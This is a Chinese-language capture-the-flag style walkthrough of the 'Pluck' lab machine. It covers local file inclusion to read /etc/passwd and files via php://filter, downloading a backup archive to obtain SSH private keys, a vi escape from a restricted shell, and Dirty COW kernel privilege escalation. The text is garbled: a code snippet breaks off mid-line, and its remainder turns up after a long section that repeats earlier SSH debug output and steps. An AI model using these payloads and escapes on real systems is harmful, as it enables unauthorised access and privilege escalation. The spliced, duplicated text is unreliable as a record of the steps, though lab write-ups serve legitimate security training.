Pluck(本地文件包含+内核漏洞提权)

靶机下载地址

1
2
3
4
5
6
7
8
9
10
11
192.168.1.115


22/tcp   open  ssh     OpenSSH 7.3p1 Ubuntu 1 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
3306/tcp open  mysql   MySQL (unauthorized)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

mysql -h 192.168.1.115  -u root -p
Enter password: 
ERROR 1130 (HY000): Host '192.168.1.102' is not allowed to connect to this MySQL server

本地文件包含

http://192.168.1.115/index.php?page=contact.php

4

存在本地文件包含漏洞,可以达到任意文件读取的目的。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
http://192.168.1.115/index.php?page=/etc/passwd

bob:x:1000:1000:bob,,,:/home/bob:/bin/bash
peter:x:1001:1001:,,,:/home/peter:/bin/bash
paul:x:1002:1002:,,,:/home/paul:/usr/bin/pdmenu
backup-user:x:1003:1003:Just to make backups easier,,,:/backups:/usr/local/scripts/backup.sh
---

http://192.168.1.115/index.php?page=/usr/local/scripts/backup.sh

文件内容如下
#Backup directories in /backups so we can get it via tftp

echo "Backing up data"
tar -cf /backups/backup.tar /home /var/www/html > /dev/null 2& > /dev/null

tar -cf是建立备份文档的意思
---
wget http://192.168.1.115/index.php?page=/backups/backup.tar

该备份文档只进行了打包,没有压缩,下图可见文件绝对路径。

5

ssh -i id.rsa paul@IP ssh peter@192.168.1.103 无法连接 6

查看ssh配置 http://192.168.1.103/index.php?page=/etc/ssh/sshd_config 查找资料后发现,ssh私钥是这样的格式。

1
2
3
-----BEGIN RSA PRIVATE KEY-----
xxx省略
-----END RSA PRIVATE KEY-----

而路径中有/home/paul/keys/id_key2、/home/paul/keys/id_key3等等,只有找到正确的ssh私钥才能连接。

sql注入

sql报错注入。因为oscp考试不允许使用自动化利用的工具,于是我特地手动利用,不使用sqlmap。 3

admin.php

http://192.168.1.103/index.php?page=php://filter/convert.base64-encode/resource=admin.php

关键代码在这一行

1
2
3
4
5
6
7
8
if(strpos($_POST['email'], '

查看writeup

以前没有遇到这种ssh登陆错误。

ssh -v -i id.rsa4 paul@192.168.1.103

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
OpenSSH_8.0p1 Debian-3, OpenSSL 1.1.1c  28 May 2019
debug1: Reading configuration data /etc/ssh/ssh_config
debug1: /etc/ssh/ssh_config line 19: Applying options for *
debug1: Connecting to 192.168.1.103 [192.168.1.103] port 22.
debug1: Connection established.
debug1: identity file id.rsa4 type -1
debug1: identity file id.rsa4-cert type -1
debug1: Local version string SSH-2.0-OpenSSH_8.0p1 Debian-3
debug1: Remote protocol version 2.0, remote software version OpenSSH_7.3p1 Ubuntu-1
debug1: match: OpenSSH_7.3p1 Ubuntu-1 pat OpenSSH_7.0*,OpenSSH_7.1*,OpenSSH_7.2*,OpenSSH_7.3*,OpenSSH_7.4*,OpenSSH_7.5*,OpenSSH_7.6*,OpenSSH_7.7* compat 0x04000002
debug1: Authenticating to 192.168.1.103:22 as 'paul'
debug1: SSH2_MSG_KEXINIT sent
debug1: SSH2_MSG_KEXINIT received
debug1: kex: algorithm: curve25519-sha256@libssh.org
debug1: kex: host key algorithm: rsa-sha2-512
debug1: kex: server->client cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none
debug1: kex: client->server cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none
debug1: expecting SSH2_MSG_KEX_ECDH_REPLY
debug1: Server host key: ssh-rsa SHA256:6k4RLcLMdnm7mjtP4Kh+t6wSWNuYpHtRT3tkINCk1wY
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@    WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!     @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that a host key has just been changed.
The fingerprint for the RSA key sent by the remote host is
SHA256:6k4RLcLMdnm7mjtP4Kh+t6wSWNuYpHtRT3tkINCk1wY.
Please contact your system administrator.
Add correct host key in /root/.ssh/known_hosts to get rid of this message.
Offending RSA key in /root/.ssh/known_hosts:1
  remove with:
  ssh-keygen -f "/root/.ssh/known_hosts" -R "192.168.1.103"
RSA host key for 192.168.1.103 has changed and you have requested strict checking.
Host key verification failed.

ssh-keygen -f “/root/.ssh/known_hosts” -R “192.168.1.103”

只要根据提示,删除以前的记录即可。可能是因为以前也使用过相同的ip进行ssh无密码登陆,而这个是不同的主机,所以登陆失败了。

删除记录后再次尝试登陆,ssh会提示是否保存记录,我们输入yes。

登陆成功。

7

突破限制的shell

ssh登陆后,是一个限制权限的shell,只能运行上述图片中的功能。

选择edit file,然后输入/tmp,这是一个存在的目录。 使用的是vi编辑器来编辑文件。

输入

1
2
:set shell=/bin/bash
:shell

于是获得了paul权限的/bin/bash

8

有哪些方法突破有限制的shell?

提权

uname -a Linux pluck 4.8.0-22-generic #24-Ubuntu SMP Sat Oct 8 09:15:00 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

上传linux-exploit-suggester.sh

9

dirtycow内核漏洞提权。

') !== false) { echo "<strong>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 6</strong>"; }else{ echo "<strong>Incorrect Username or Password!</strong>"; } strpos — 查找字符串首次出现的位置 如果email中存在单引号,就会提示一串sql语法错误。

查看writeup

以前没有遇到这种ssh登陆错误。

ssh -v -i id.rsa4 paul@192.168.1.103

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
OpenSSH_8.0p1 Debian-3, OpenSSL 1.1.1c  28 May 2019
debug1: Reading configuration data /etc/ssh/ssh_config
debug1: /etc/ssh/ssh_config line 19: Applying options for *
debug1: Connecting to 192.168.1.103 [192.168.1.103] port 22.
debug1: Connection established.
debug1: identity file id.rsa4 type -1
debug1: identity file id.rsa4-cert type -1
debug1: Local version string SSH-2.0-OpenSSH_8.0p1 Debian-3
debug1: Remote protocol version 2.0, remote software version OpenSSH_7.3p1 Ubuntu-1
debug1: match: OpenSSH_7.3p1 Ubuntu-1 pat OpenSSH_7.0*,OpenSSH_7.1*,OpenSSH_7.2*,OpenSSH_7.3*,OpenSSH_7.4*,OpenSSH_7.5*,OpenSSH_7.6*,OpenSSH_7.7* compat 0x04000002
debug1: Authenticating to 192.168.1.103:22 as 'paul'
debug1: SSH2_MSG_KEXINIT sent
debug1: SSH2_MSG_KEXINIT received
debug1: kex: algorithm: curve25519-sha256@libssh.org
debug1: kex: host key algorithm: rsa-sha2-512
debug1: kex: server->client cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none
debug1: kex: client->server cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none
debug1: expecting SSH2_MSG_KEX_ECDH_REPLY
debug1: Server host key: ssh-rsa SHA256:6k4RLcLMdnm7mjtP4Kh+t6wSWNuYpHtRT3tkINCk1wY
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@    WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!     @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that a host key has just been changed.
The fingerprint for the RSA key sent by the remote host is
SHA256:6k4RLcLMdnm7mjtP4Kh+t6wSWNuYpHtRT3tkINCk1wY.
Please contact your system administrator.
Add correct host key in /root/.ssh/known_hosts to get rid of this message.
Offending RSA key in /root/.ssh/known_hosts:1
  remove with:
  ssh-keygen -f "/root/.ssh/known_hosts" -R "192.168.1.103"
RSA host key for 192.168.1.103 has changed and you have requested strict checking.
Host key verification failed.

ssh-keygen -f “/root/.ssh/known_hosts” -R “192.168.1.103”

只要根据提示,删除以前的记录即可。可能是因为以前也使用过相同的ip进行ssh无密码登陆,而这个是不同的主机,所以登陆失败了。

删除记录后再次尝试登陆,ssh会提示是否保存记录,我们输入yes。

登陆成功。

7

突破限制的shell

ssh登陆后,是一个限制权限的shell,只能运行上述图片中的功能。

选择edit file,然后输入/tmp,这是一个存在的目录。 使用的是vi编辑器来编辑文件。

输入

1
2
:set shell=/bin/bash
:shell

于是获得了paul权限的/bin/bash

8

有哪些方法突破有限制的shell?

提权

uname -a Linux pluck 4.8.0-22-generic #24-Ubuntu SMP Sat Oct 8 09:15:00 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

上传linux-exploit-suggester.sh

9

dirtycow内核漏洞提权。